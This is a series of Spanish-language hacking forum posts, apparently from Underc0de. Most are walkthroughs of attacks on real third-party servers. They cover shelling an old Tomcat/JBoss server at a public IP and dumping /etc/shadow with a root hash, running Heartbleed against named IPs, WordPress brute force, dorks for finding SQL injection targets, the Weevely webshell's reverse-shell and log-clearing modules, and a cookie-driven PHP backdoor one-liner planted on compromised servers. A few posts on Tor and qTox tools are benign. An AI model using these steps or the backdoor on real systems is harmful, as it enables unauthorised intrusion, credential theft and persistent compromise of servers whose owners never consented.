Código: php
"name" : "[email protected]",
"email" : "[email protected]",
"password" :   "$2a$07$342f56c383d6bd241ed54OLVQdfEDP3jZA.PiaO8BGP3yosLCevRy",
"roles" : [
"admin"


de igual manera tu puedes editar todo los atributos de las columnas porque tienes todos los privilegios necesarios, si eres de las personas que se aburren escribiendo todo en texto plano dichas sintaxis, puedes instalar "Robomongo" - GUI para facilitarte todo este proceso:



Descarga:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pentesting

Explotando un servidor apache obteniendo una SHELL por medio del fallo 5-5.
de tomcat.

EL fallo tiene mucho tiempo de a ver sido descubierto, hace mucho  tiempo, en mi caso hubiera elegido hacerlo por msfconsole pero me dio mucha flojera xD
ya que me hubiera gustado enseñarles como auditar un servidor apache para saber si es o no vulnerable, y explotarlo por diferentes maneras, pero creo que por mas técnicas que les enseñe, todo ese proceso puedo ser optimizado por el siguiente exploit:

"Jexboss"


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Descarga:

Código: php
root@kali:~# git clone https://github.com/joaomatosf/jexboss


Encontrar servidores vulnerables:

Server: Apache-Coyote/1.1 Tomcat-5.5



En mi caso elegí un servidor de mi país:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si desean utilizar una búsqueda personalizada pueden utilizar las siguientes dorks:

country:es           "PAÍS"
city:barcelona     "CIUDAD"
hostname:es        "DOMINIO"

ustedes pueden efectuar cualquier rango de país que deseen.

Código: php
root@kali:~#cd tomcat

root@kali:~/tomcat# python jexboss.py -host http://190.102.149.180:8080/




como vemos hemos obtenido una sesión por medio de una shell, lo que haremos sera verificar en que S.O esta corriendo, por mi parte viendo que es un ordenador peruano, suponía que seria un windows server xD!



Les dejare algo en claro, si el sistema operativo es "WINDOWS" debemos utilizar interpretes de comandos #CMD, para poder interactuar correctamente con el servidor.



Si fuese un sistema "GNU" puedes utilizar el comando "uname -a" para saber la kernel que esta utilizando, pero este exploit automáticamente te detecta y muestra el kernel.



la navegación muy diferente un ejemplo para ver los directorios y que permisos tendríamos ejecutan: ls -la.

si deseas obtener credenciales del usuario del sistema operativo utilizaremos 2 comandos:



Código: php
Shell> cat /etc/passwd - sirve para verificar los usuarios que corren en diferentes servicios.

Shell> cat /etc/shadow -dumpear credenciales de servicios principales.

Credencial:

root:$6$3cdgngze$gafERX.OCPKvDAhgp9WyriAnR/iuDBZq6WjcZxe8BaFGga/Z5Zz1cCfj7aCxrrZB20RL3j6frbVBDzCZiCa9g0:17107:0:99999:7:::

Bueno si deseas obtener la contraseña puedes hacerlo por "brute force" o simplemente ejecutando una sesión meterpreter por msfconsole y empezar a desmadrar el servidor, por un Exploit local.

Cabe decir que el exploit recientemente ha sido actualizado, con la cual se han añadido mas servicios vulnerables y un "BYPASS" sobre algunos WAF.


Exploit heartbreak


Sin duda uno de los BUG's mas peligrosos a nivel mundial, que se descubrió en el año 2014, aun recuerdo esos años con el foro BlackLastSecurity que funde con mi buen amigo, Kelvin Parra.

Empresas importantes a nivel mundial fueron victima de ataques como:
Youtube, Facebook, Google, Twitter, etc, un 99.9 % de servidores a nivel mundial fueron comprometidos en aquel entonces.
Seguimos con algunos "Tips", si bien es cierto algunas personas no han explotado un servidor con la vulnerabilidad Open SSL llamado Heartbleed.

Si deseas encontrar algunos de estos servidores vulnerables "SHODAN" te ofrece una búsqueda avanzada:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Tenemos 141,927 resultados, para que vayan experimentando este tipo de ataque.

Exploit:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una ves descargado lo extraemos con el nombre de la carpeta "bleed", posteriormente pasaremos a ingresar a dicha carpeta.
Código: php

root@kali:~# cd bleed


modo de uso la mayoría de dispositivos encontrados trabajan con el puerto 443:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: php

root@kali:~# python heartbleed.py 209.166.152.220


Se ejecutaría de esta manera, sin el puerto por el simple hecho de tener el puerto por default


Este host corre el servicio en el puerto 8443:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Entonces lo ejecutaríamos de esta manera:

Código: php
root@kali:~# python heartbleed.py 188.165.216.132 8443




Hemos explotado el servidor correctamente capturando el trafico de peticiones en vivo, este bug es temido porque captura el trafico de datos de peticiones de la web en su totalidad, cabe decir que si una "organización" grande como facebook en el 2014 millones de peticiones se hacían por minuto, cuantas credenciales fueron capturadas en vivo.

Ahora imagínese en empresas millonarias como PayPal, Ebay, etc el dolor de cabeza que tuvieron en aquel entonces y los millones de dolares que se perdieron.

por ultimo no quiero hacer este POST demasiado largo con otros métodos, espero haberles ayudado.

Saludos!
#24


Saludos hermanos de underc0de, estuve alejado por motivos de estudio pero ya regrese nuevamente, en esta oportunidad les traigo una herramienta muy útil para los amantes de la "Deep Web" llamada Onioff.

Como bien sabemos Tor Browser es el un servicio de Anonimato cuyas conexiones trabajan de manera independiente denominadas "Nodos", las cuales tienen conexiones "Socks4" y "Socks5".

Si no conoces el servidor Tor, me encantaría que visites mi segundo Post donde enseño como instarlo y configurarlo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 

El siguiente POST es sobre su mensajería encriptada de Tor, las cuales pueden ser utilizadas en Gmail, etc.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Si deseas crear tu servidor "Onion" desde tu Debian puedes visitar este Post.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Onioff


Onioff es una herramienta Open Source simple, cuyo fin es verificar que los servidores web onion esten disponible o no.

¿Quien no se aburre de encontrar un link y pegarlo en nuestro navegador Tor para verificar si esta valido o no, introduciéndolo uno por uno?
Pues llego la solución a nuestro problema.

Descarga

Código: php
root@kali:~# git clone https://github.com/k4m4/onioff.git
ot@kali:~# cd onioff
root@kali:~/onioff# pip install -r requirements.txt




En mi caso los requisitos ya los tenia instalado, con ustedes ese procedimiento sera mas extenso ya que descargara cada paquete y luego procedera a instalarse.

Modo de Uso

Si desean ver las opciones pueden utilizar su sintaxis, pero antes debemos darle privilegios a la carpeta.

Código: php
root@kali:~/onioff# chmod 775 *
root@kali:~/onioff# python onioff.py -h




Como podemos ver esta herramienta tiene 2 formas de testear los links de manera independiente o ejecutando un archivo en .txt con varias cantidades de paginas.

Primero deben tener instalado "Tor" como servicio dependiente en GNU/debian - Kali linux como otros S.O de seguridad Informática, tiene instalado por defecto dicho servicio no hay necesidad de instalarlo.

Si no lo tienes lo puedes instalar de la siguiente manera:

Código: php
root@kali:~/onioff#apt-get install tor


Ejemplos

Antes de ejecutarlo deben iniciar el servicio de tor de la siguiente manera:
Código: php

root@kali:~/onioff# service tor start // iniciar servidor tor
root@kali:~/onioff# service tor status // ver el estado del servicio si se encuentra activo




Haremos el primer ejemplo, que sera ejecutar la verificación de un solo link en onioff, para comprobar su funcionalidad.

Código: php
root@kali:~/onioff# python onioff.py http://kpdqsslspgfwfjpw.onion/




Como vemos el servidor onion ,esta fuera de servicio.

Introducimos otro link en este caso es del buscador " DuckDuckgo "



seguiremos con el segundo ejemplo, primero crearemos un archivo con Extensión "TXT" lo llamare links.txt donde añadiremos los links de los servidores onion que deseemos testear.



Luego de ello pasaremos a ejecutarlo se la siguiente manera:

Código: php
root@kali:~/onioff# python onioff.py -f links.txt -o reporte.txt

pasare a explicar sus argumentos:

-f (añades el nombre del archivo) 

-o (nombre del archivo donde se guardara los datos positivos)



  Les dejare algunos servidores web donde podran encontrar muchos servidores Onion para que hagan su TEST, se que les encatara.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias por visitar este humilde Post, Saludos y éxitos para todos.
#25

Saludos underc0deanos, tengo una gran noticia para toda la comunidad, estoy elaborando un libro de 200 hojas sobre Pentesting a nombre de la comunidad Underc0de, titulado:

"Undertesting - Kali Linux 2016 Release"



siempre y cuando los administradores me den el SI.

El libro lo liberare en un PDF sera totalmente FREE : )
#26

Siguiendo con la maraton de POST'S hermanos xD , enseñare a como fixear el Weevely en nuestro Kali Linux,
Weevely es una shell de línea de comandos web ampliado dinámica mente por la red en tiempo de ejecución diseñado para la administración remota y la prueba de testeo. proporciona una consola tipo telnet a través de un código en php que se ejecutara en el objetivo remotamente, incluso en ambientes restringidos.

El proceso ejecuta el footprint y más de 30 módulos con metasploit extensible para administrar, llevar a cabo una prueba de testeo, después de la hazaña, y auditar la web remotamente con el fin de escalar privilegios para un análisis màs profundo en las redes internas.

Los módulos incluyen:


  • Terminal de red Shell / PHP telnet
    Errores de configuración de servidor común de auditoría
    Consola de SQL pivotando en el blanco
    Proxy tráfico HTTP a través de destino
    Monte el sistema de archivos de destino para el punto de montaje local
    Análisis de red Conducta pivotantes en el blanco
    Carga de archivos y la descarga
    Inversa de Spawn y TCP directos
    Cuentas de servicios de fuerza bruta
    Comprimir y descomprimir zip, gzip, bzip2 y alquitrán archivos

Referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Antes que nada, vamos a actualizar nuestro weevely en este caso, kali linux. para ellos pasaremos a descargar el archivo y proceder a la instalación de dependencias.

Este post lo hice ya que hace momentos uno de mis colegas mi pidió que le ayudase a reparar el fallo, ya que no podría ejecutar la conexión  remota y por ende les salían errores de lineas de código:



como vemos, directamente el código no dice que faltan módulos para que se ejecute la conexiones mediante sock, entonces lo que haré sera instalar la versión con sus repertorios actualizando de Pysocks :

Código: php
root@kali:~# git clone https://github.com/Anorov/PySocks.git
root@kali:~# chmod 775 *
root@kali:~# python setup.py build
root@kali:~# python setup.py install



una ves instalado todo los repertorios socks, pasaremos a ejecutar el weevely que llega por default en Kali Linux:


Si desean descargan la nueva versión, con algunos complementos nuevos, lo pueden hacer de la siguiente manera.


Aprendiendo algunos comandos

:audit_filesystem - Auditando carpetas el sistema


:audit_etcpasswd - El archivo /etc /passwd es la base de datos basada en texto plano de información sobre los usuarios del sistema dedicado, la cual puede ser aprovechado para una recolección de datos aprovechados para un symlink.


:system_info - Información del sistema
:uname-a     - información del kernel
:net_ifconfig - lista rangos del servicio



Otros comandos:

Código: php
                                                      
:audit_phpconf        Audit PHP configuration.                                             
:audit_suidsgid       Find files with SUID or SGID flags.                                 
:shell_sh             Execute Shell commands.                                             
:shell_su             Elevate privileges with su command.                                 
:shell_php            Execute PHP commands.                                               
:system_extensions    Collect PHP and webserver extension list.                                                                     
:backdoor_reversetcp  Execute a reverse TCP shell.                                         
:backdoor_tcp         Spawn a shell on a TCP port.                                         
:bruteforce_sql       Bruteforce SQL database.                                             
:file_find            Find files with given names and attributes.                         
:file_upload          Upload file to remote filesystem.                                   
:file_grep            Print lines matching a pattern in multiple files.                   
:file_enum            Check existence and permissions of a list of paths.                 
:file_clearlog        Simple Clear Log                                                     
:file_rm              Remove remote file.                                                 
:file_edit            Edit remote file on a local editor.                                 
:file_upload2web      Upload file automatically to a web folder and get corresponding URL.
:file_bzip2           Compress or expand bzip2 files.                                     
:file_cp              Copy single file.                                                   
:file_check           Get remote file information.                                         
:file_read            Read remote file from the remote filesystem.                         
:file_touch           Change file timestamp.                                               
:file_mount           Mount remote filesystem using HTTPfs.                               
:file_cd              Change current working directory.                                   
:file_gzip            Compress or expand gzip files.                                       
:file_zip             Compress or expand zip files.                                       
:file_webdownload     Download URL to the filesystem                                       
:file_download        Download file to remote filesystem.                                 
:file_tar             Compress or expand tar archives.                                     
:file_ls              List directory content.                                             
:sql_console          Execute SQL query or run console.                                   
:sql_dump             Multi dbms mysqldump replacement.                                   
:net_phpproxy         Install PHP proxy on the target.                                     
:net_proxy            Proxify local HTTP traffic passing through the target.               
:net_scan             TCP Port scan.                                                       
:net_mail             Send mail.                                                           
:net_curl             Perform a curl-like HTTP request.                                   


Sin mas que decir, no hace falta ejecutar algunos owned a dicho servidor por motivos de ética, ante mano espero les haya gustado este articulo!
#27

Buenos dias hermanos de Underc0de he elaborado un POST bien especifico de como funciona un ataque de Fuerza Bruta o Brute Force en el CMS Wordpress.

Durante ya varios años, tenemos una herramienta llamada "WPSCAN" que se especializa en Análisis de Auditoria activa y pasiva.

Este es un ejemplo de un simple análisis que realice años atrás

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Brute Force: Este ataque en general se lleva acabo como ultimo recurso para explotar un servidor obteniendo las credenciales de "Usuario" y "Contraseña" mediante las palabras de un "Diccionario",
cabe aclarar que si una contraseña es bien formulado con caracteres Alfa Numéricos y teclas especiales, el ataque de fuerza bruta varia de la capacidad del sistema.


Como podemos ver, este es el panel que tiene "WORDPRESS", el cual puede ser modificado en la interfaz a gusto del WebMaster

Lo que primero debemos es identificar el nombre de usuario del sitio web, para ello no lo haremos con ninguna herramienta, si no con el arte de "Ver"


Al entrar a un sitio web hecho en Wordpress, vemos la siguiente "Plantilla", en mi caso hay un tema que se llama "CyberPunks Hackers", Entonces lo que haré sera entrar en ella.


Se dieron cuenta de algo¿?, Wordpress enumera los nombres de usuarios en cada "Tema" creados por los mismos, entonces vemos que el usuario se llama "CyberSecRoot"

Entonces vamos a dirigimos a Wpscan, pero antes vamos a crear nuestro diccionario o descargarlo a complejidad de cada uno.

Como vemos tengo creado un diccionario con algo de 30 palabras, que es el siguiente:


vamos a utilizar este diccionario para elaborar nuestro ataque de fuerza bruta.

Código: php
root@kali:~# wpscan --url http://192.168.217.1/wordpress/ --wordlist /root/passwords.txt --username CyberSecRoot


Comprendamos algo :

--wordlist = /root/passwords.txt  (Es el lugar donde esta almacenado nuestro diccionario)

--username CyberSecRoot (Es el nombre de usuario que vamos a obtener su contraseña)


Vemos que nos salio en blanco "Password", ya que no ha capturado la contraseña porque el "Diccionario" no cuenta en su sintaxis dicha credencial.

Entonces vamos a hacer una prueba elaborada con un diccionario personalizado que lo he sacado de Internet, que es el siguiente:


Código: php
root@kali:~# wpscan --url http://192.168.217.1/wordpress/ --wordlist /root/diccionario.txt --username CyberSecRoot



Como vemos el ataque de fuerza bruta fue exitoso:

  +----+--------------+------+-------------+
  | Id | Login       | Name | Password    |
  +----+--------------+------+-------------+
  |    | CyberSecRoot |     | universidad |
  +----+--------------+------+-------------+

La contraseña como vemos es "universidad" vamos a probarla:




Fue un éxito, el registro de dichas credenciales y método es 100% funcional si la contraseña se encuentra en nuestro diccionario.


Saludos  : )
#28
Pentesting / Method Ninja of Google Hacking
Mayo 29, 2016, 02:26:05 PM


Saludos antes de comenzar a redactar, deseo mandar saludos a un buen hermano con el seudónimo "Eduardo Desdes" la cual me a demostrado métodos nuevos de utilizar las Dorks de manera mas compleja, ya que no me gusta mucho dorkear.

Como sabemos Google es un servicio de indexación  de paginas web's,fotos,ftps,ips,entre muchos datos que se alojan cuando utilizamos dicho servicio de manera respectiva.

Ejemplo de lo que sucede al navegar en Google

Al hacer clic en Enviar, Google rastrea e indexa el contenido de la URL tal como está en ese momento. Si cambias el contenido de una URL que tiene pendiente una solicitud de envío, es posible que los resultados del nuevo rastreo sean distintos a los resultados obtenidos con Explorar como Google. Asimismo, como Google vuelve a rastrear la página al enviarla, no importa si la URL que envías se ha analizado mediante la herramienta Explorar como Google con o sin procesamiento.

Una vez enviada la URL, es posible que tengas que esperar un poco hasta que Google procese la solicitud y rastree e indexe la página.



Google nuestra arma de auditar de manera manual


Hemos hablado respectivamente que google es un buscador de todo tipo de datos a nivel mundial ya que contiene millones de millones de sitios enlazados al servicio del publico.

Para un auditor google es la mejor arma en todos los sentidos ya que nos va facilitar el trabajo de intelectual con un objetivo que deseamos auditar de manera rápida  y eficaz  al momento de concatenar con las denominadas " Dorks of Google " combinándolas para tener un mayor desenlace en nuestro objetivo.

Plataforma del atacante



Uno de los servicios donde liberan miles de wikileaks es sin duda  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta durante los años de vigencia de este servicio se a alojado información de alto prestigio, pero lo que nosotros necesitaremos serán los Posts de dorks que podremos obtener mediante su búsqueda hasta el momento nos a indexeado 1,930 resultados ojo debo aclarar que  dicho servicio nos dará información de cualquier tipo de dorks como documentos,archivos,ftp,ip,cámaras e infinidades de dispositivos que tengan una interface de protocolo en la red mundial.

Todos hemos utilizado algunas dorks como:

Inurl:/noticias.php?id=
inurl:/eventos.php?id=
inurl:/detalles.php?id=
inurl:/principal.php?id=
inurl:/imagenes.php?id=
inurl:/videos.php?id=

Entre otras muchas que hemos visto en la web.



como vemos nos arrojan varios parámetros GET con la palabra noticias.php?id= , todo el mundo lo hace de manera recurrente consiguiendo mayormente vulnerabilidades de sql inyección.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'6' at line 1


Google es una gran base de datos donde se acumulan muchos datos sensibles por el descuido de los mismo administradores , depende del usuario malicioso para usar esta información para su conveniencia

Explicación de las dorks :

Las Dorks son una serie de sentencias conformadas por operadores de búsqueda avanzada de google , que nos sirve para perfeccionar nuestra búsqueda y para encontrar paginas vulnerables. A continuación mencionare unos cuantos comando principales.

inurl:(panel) el buscador mostrara todos los resultados tal que en su url este la palabra 'panel'

intitle:(inicio) el buscador mostrara todos los resultados tal que en su titulo de pagina este la palabra 'inicio'

intext:(contraseña) el buscador mostrara todos los resultados tal que en el texto se su pagina este la palabra 'contraseña'

filetype:(pdf) el buscador mostrara todos los resultados que sean de tipo pdf eso se puede reemplazar por php, html , jpg y cualquier otro archivo.

site:(edu.pe) el buscador mostrara todos los resultados tal que su dominio sea No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Se pueden poner mas de una palabra (esto sirve para todo los comandos) por ejemplo:

intext:(contraseña usuario) Muestra los resultados que tengan la cadena 'contraseña usuario'

intext:(contraseña & usuario) Muestra los resultados que tengan 'contraseña' y 'usuario'

intext:(contraseña | usuario) Muestra los resultados que tengan 'contraseña' o 'usuario'

Se puede quitar resultados (esto sirve para todo los comandos) por ejemplo:

intext:(contraseña usuario) -intext:(sangre) Muestra los resultados que tengan la cadena 'contraseña usuario' y que no tengan la palabra 'sangre'

Ahora solo queda en su imaginación las dorks que desean armar  ! Por ejemplo

site:edu.pe intext:(usuario contraseña) filetype:php Esto mostrara los paneles de las webs de las universidades , al menos los de tipo php y que estén en español

site:pe intext:(femenino & telefono) filetype:xls Esto mostrara los teléfonos de mujeres del Perú jajaja.


Escenario dirigido a un servidor web:

Una anécdota que me encanto fue cuando  estuve auditando de manera manual y a la vez con burp Suite y una herramienta privada que programe la cual consta de hacer un escaneo general capturando al servidor de manera completa y efectiva de todos los archivos,módulos y demás que tengan en la misma.

Algún día liberare mi herramienta,pero por el momento estará en mi a mi disposición personal.

Cyberscan.py





la vulnerabilidad fue reportado, espero lo hayan parchado.


la adecdota es que con mi camarada Eduardo Desdes, estuvimos auditando una web "X", entonces empece a utilizar las herramientas que comente hace momentos, cabe destacar que la herramienta estaba en Joomla, me parecio interesante pero lo único que encontraba era falsos positivos y algunos XSS ya que por mi parte los encontraba de forma manual, por otra mi herramienta capturada el sitio web, entonces empece aburrirme y mi camarada me comento lo siguiente "Encontré un Error", mi primera impresión fue "WTF" como lo hiciste? ni con Joomscan xD! y me dijo pues " utilice una dork".me recordó a mis comienzos cuando buscaba parámetros  GET and POST para encontrar fallos a sitios arbitrarios o a un objetivo central

Lo interesante de todo esto es que me había olvidado de hacer un dns inverso al sitio web para ver que tiene sus subdominios.

Entonces fue cuando me enseño una dork peculiar :

site:ejemplo.gob.pe inurl:& -inurl:index.php

Entonces me di cuenta cuando ejecute la sentencia ' que era una Sql inyección ciega pues mi camarada efectivamente lo había explotado : )

Entonces comprobé la dork y efectivamente me sorprendió.



El mejor  consejo que puedo dar es que no hay que discriminar, ni disminuir lo que las dork pueden encontrar mediante una búsqueda configurada para obtener datos dedicados para un ataque dirigido, aveces recordar nuestros comienzos pueden ser  utilices a la hora de utilizarlos, Gracias.

#29


Saludos nuevamente hermanos de underc0de en esta oportunidad vamos a modernizarnos para dejar atrás las webshells, que en su mayoría ya están quemadas por algunos antivirus y firewalls que puede tener un servidor web,dando  entrada a Backcookie  una herramienta escrita en python la cual tiene como función tener conexiones entrantes de servidores web mediante cookies, vayamos a la acción

Backdoors detectable.



¿Que es una Cookie?
 
Las cookies son un mecanismo por el que se almacenan datos en el navegador remoto para monitorizar o identificar a los usuarios que vuelvan al sito web.

referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo que haremos sera descargar la herramienta Backcokkie, luego de ello pasaremos a extraerlo

Código: php
root@kali:~# wget https://github.com/jofpin/backcookie/archive/master.zip 

Antes de comenzar deseo mandar un saludo  para un buen hermano mio, "Fraph Core" que el día de hoy esta cumpliendo un año mas de vida, por este motivo realizo este post, ya que la herramienta es creada por el y es la forma mas oportuna de hacerlo.
Feliz cumpleaños hermano!!

Iniciando la herramienta




Antes que nada podemos observar como funciona la herramienta, de acuerdo al autor funciona de dos maneras :

Código: php
    Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
    Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Métodos de subir el código de conexión 

Source:


<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>


El primer método en un servidor VPS

sera crear un archivo .php añadiendo el codigo y subirlo al servidor web.



El segundo método

seria añadir el código en archivo del servidor web, mediante una webshell.



Estos métodos serian los que podan utilizar ustedes,mas abajo les tengo una sorpresa cual método yo  me ingenie para hacerlo aun mas confidencial.

entonces una ves añadido nuestro código, pasaremos ejecutarlo:





Como podemos observar el dominio comprometido es un servidor privado (VPS), la cual tenemos acceso al sistema del servidor, la cual podemos subir nuestros payload de meterpreter,archivos RAT,o los que ustedes deseen, en mi caso les enseñare a utilizar esta herramienta de manera estándar, en este servidor VPS en Windows como prueba de concepto.

Lo que haremos sera ejecutar el comando CMD



como vemos hemos tenido acceso a la interprete de comandos de windows, lo que podemos hacer ahora es ejecutar los comandos que utilizamos siempre, en mi caso haré un mapeo de todas las IP'S conectadas al servidor, en este caso todos los demás servicios privados.



como podemos observar nos arroja las IP'S conectadas la cual podemos aprovecharlas para auditarlas y explotarlas mediante metasploit, o subir un archivo RAT y capturar todos los datos del servidor, por mi parte no lo haré, por motivos de ética, de igual manera podemos ver el tipo de servicio del router como veremos aquí:



Paremos a entrar a otro servidor web, en este caso el siguiente:



Como vemos es un servidor en Linux la cual, podemos interactuar con ella, sin mas que decir doy como culminado este POST, espero les aya gustado demasiado la herramienta Backcookie, ya que llevo casi un año utilizando esta gran herramienta y lo hago publico porque eh visto que hay "Personas" que han modificado el nombre del autor y han estado ripiandola :/
#30

Buenas tardes hermanos de underc0de, les traigo otro servicio de mensajería encryptada llamada qTox, es un protocolo de mensajería y llamadas de vídeo gratuito y de código abierto peer-to-peer cifrada al instante. El objetivo declarado del proyecto es proporcionar una comunicación segura pero de fácil acceso para todo el mundo, es un poderoso cliente de Tox que sigue las directrices de diseño Tox mientras se ejecuta en todas las plataformas.

¿Como se inicio Tox?

Con el auge de los programas de vigilancia del gobierno, Tox provee una aplicación fácil de usar que le permite conectarse con amigos y familiares sin que nadie más escuche. Mientras otros servicios de renombre que tenga que pagar por características, Tox es totalmente gratuito y viene sin la publicidad.

¿Como te protege Tox?

Tox protege su privacidad mediante la eliminación de la necesidad de confiar en las autoridades centrales para proporcionar servicios de mensajería, ocultando su identidad (En forma de meta-datos, su dirección IP) de las personas que no son sus amigos autorizados, haciendo cumplir Off-The-Record Mensajería como predeterminada y sólo modo de funcionamiento para todos los mensajes, y al hacer que su identidad imposible de falsificar sin robar su clave personal y privado en su propia computadora.

Tox no intenta ocultar su dirección IP cuando se comunica con otros usuarios, ya que todo el punto de peer-to-peer es conectar directamente a tus amigos. Una solución existe en forma de túnel conexiones Tox a través de Tor. Sin embargo, un usuario no puede revelar la dirección IP de otro usuario utilizando sólo una identificación Tox para encontrar el usuario en la DHT, la dirección IP sólo será perceptible cuando los usuarios se convierten en "amigos."

Características:

    Uno a uno de la charla con los amigos
    chats en grupo
    Las transferencias de archivos, con la vista previa de imágenes
    Llamadas de audio, incluidas las llamadas de grupo
    Las llamadas de video
    Apoyo Tox DNS y Tox URI
    Las traducciones en varios idiomas
    Avatares
    Mensajes fuera de línea Faux
    Historia
    Imágenes
    Emoticones
    Las actualizaciones automáticas en Windows y Mac, paquetes en Linux
    Y muchas más opciones!

Instalación:

Antes de empezar de descargar los repertorios, pasaremos a añadir el repositorio de Tox.
Código: php

root@kali:~# echo "deb https://pkg.tox.chat/debian nightly release" | sudo tee /etc/apt/sources.list.d/tox.list
root@kali:~# wget -qO - https://pkg.tox.chat/debian/pkg.gpg.key | sudo apt-key add -
root@kali:~# sudo apt-get install apt-transport-https
root@kali:~# sudo apt-get update



Luego de completar lo siguiente, pasaremos a descargar el cliente de qtox para adjuntar la conexión de este servicio.
Código: php

root@kali:~# sudo apt-get install qtox
root@kali:~# qtox



Al terminar de instalar el qtox, ejecutamos la herramienta y nos aparecerá  el siguiente cuadro donde nos registraremos al servicio, añaden sus credenciales de cuenta y le darán "Create Profile" y automáticamente nos aparecerá nuestra plataforma de CHAT:


Como vemos yo configure el idioma a español ustedes pueden hacerlo en la barra de abajo de una tuerca esta la configuración de la estructura y pueden editarlo a su gusto, en la parte para agregar a sus amigos necesitan su ID de tox, la cual esta en su perfil de usuario.

Espero les haya gustado este articulo, un saludo.
#31
SI bien es cierto, underc0de es una "comunidad" que tiene años de estar vigente en nuestra época y es muy conocida en este mundo del Pentesting & Seguridad Informática

¿Que significa underc0de para ti?



Para mi underc0de es una comunidad que se destaca por sus buenos administradores y miembros, sobre todo en su amabilidad y humildad que se tiene, en mi experiencia muy corta, me agrada esta comunidad y seguiré dando lo mejor de mi para brindar mis "Micro-conocimientos".

Sin duda en la comunidad se enseña y se aprende, pero mas que eso se ganan "Amistades" : )

Saludos para todos mis hermanos de underc0de!!  8)


#32


Buenas madrugadas xD hermanos de underc0de les enseñare a como podemos auditar sistemas a nivel mundial por los rangos que las ISP otorgan a cada país, este POST lo quise elaborar hace aproximadamente hace mas de 1 año, pero motivos de tiempo y ocupaciones no me facilito hacerlo, pero hoy tengo el agrado de hacerlo publico, eh visto que la herramienta "Masscan" ya la han publicado en algunos vídeos  o foros pero con un contenido pobre, claro sin desprestigiar a mis colegas en sentido "ordinario", lo que haré yo sera innovar las investigaciones en adjuntar las herramientas  Masscan y Blockfinder, para globalizar nuestra investigación a un nivel de calidad mundial.

¿Que es Masscan?

Masscan es el escáner más rápido en en análisis de  puerto de Internet. es capaz de analizar la totalidad de Internet en menos de 6 minutos, la transmisión de 10 millones de paquetes por segundo.

Produce resultados similares a nmap el más famoso escáner de puertos.

literalmente funciona más como scanrand, unicornscan y zmap, utilizando la transmisión asíncrona. La principal diferencia es que es más rápido de estos otros escáneres. Además, es más flexible, permitiendo rangos de direcciones y rangos de puertos arbitrarios.

¿Que es Blockfinder?

Blockfinder permite identificar, contactar y potencialmente obtener cada red de computadoras en el mundo,  es una consola basada en un texto simple, esta herramienta envuelve una lista de bloques de red para un país determinado otorgando los rangos de IP que se utilizan en sus ISP.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Luego de haber leído la función de cada herramienta, pasemos a descargarlas ya sea manualmente o por la terminal, en mi caso lo haré por la terminal.

Código: php
root@kali:~# git clone https://github.com/robertdavidgraham/masscan.git
root@kali:~# cd masscan
root@kali:~/masscan# chmod 775 *
root@kali:~/masscan# sudo apt-get install git gcc make libpcap-dev




lo primero que hice fue descargar el masscan, posteriormente ingresamos  la carpeta dimos los permisos de ejecución al modulo y luego de ello instale lipbcap, ya que necesitamos de dicho repositorio para que la herramienta  se ejecute sin ningún error.

Luego de ello pasaremos a instalarlo con el comando "make"



Una ves hecho todos los procedimientos tendremos nuestro masscan corriendo perfectamente,antes de ejecutarlo pasaremos a descargar Blockfinder.
Código: php

root@kali:~# git clone https://github.com/ioerror/blockfinder.git
root@kali:~# cd blockfinder
root@kali:~/blockfinder# chmod 775 *
root@kali:~/blockfinder# ./blockfinder.py -i




Como vimos de igual manera lo descargamos, entramos al directorio, dimos permisos en el modulo pero al ejecutarlo ./blockfinder.py -i , la sentencia -i actualiza los paquetes de rangos relacionados a cada código ISO de cada País, la cual beneficiaria esta herramienta para tener un buen resultado.

Códigos ISO

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una ves entendido lo siguiente, pasaremos a obtener los rangos de IP de un país, en mi caso buscare el de Perú para esta prueba de concepto.
Código: php

root@kali:~/blockfinder# ./blockfinder.py -v -t PE




Para ver el análisis completo puede ingresar al siguiente link:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
una ves obtenido los rangos pasaremos a escoger un RANGO que deseemos, en mi caso fue el siguiente: 190.187.128.0/17

ahora pasaremos a ingresar al masscan para analizar el rango especifico y puertos que deseemos capturar en mi caso, sera el 445 que es vulnerable a muchos ataques como el conocido exploit Netapi, por msfconsole, de igual manera podemos ubicar puertos referentes a FTP,SMTP, entre muchos los cuales tengan como objetivo.



como vemos nos arroja una lista el escaneo y vemos que esta empezando a escanear 32769 equipos que están en proceso de análisis, si deseamos guardarlo en un archivo podemos hacerlo de la siguiente manera:

Código: php
root@kali:~/masscan/bin# ./masscan -p445 190.187.128.0/17 -oX scan.xml

en mi caso yo lo deje como opcional llame el archivo scan con la extensión .xml.



el archivo se encuentra alojado en la carpeta donde ejecutaron el masscan con el nombre que asignaron en mi caso scan.xml
En nuestro caso podemos escoger una IP y analizarlo con el buscador Shoudan para ver los servicios que consta dicho sistema:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



ataques remotos uno puedo añadir una lista de IP para proceder a escanear y lanzar el Hail Mary para explotar de manera automática algunos sistemas mientras puede estar ejecutando otra cosa a la vez.

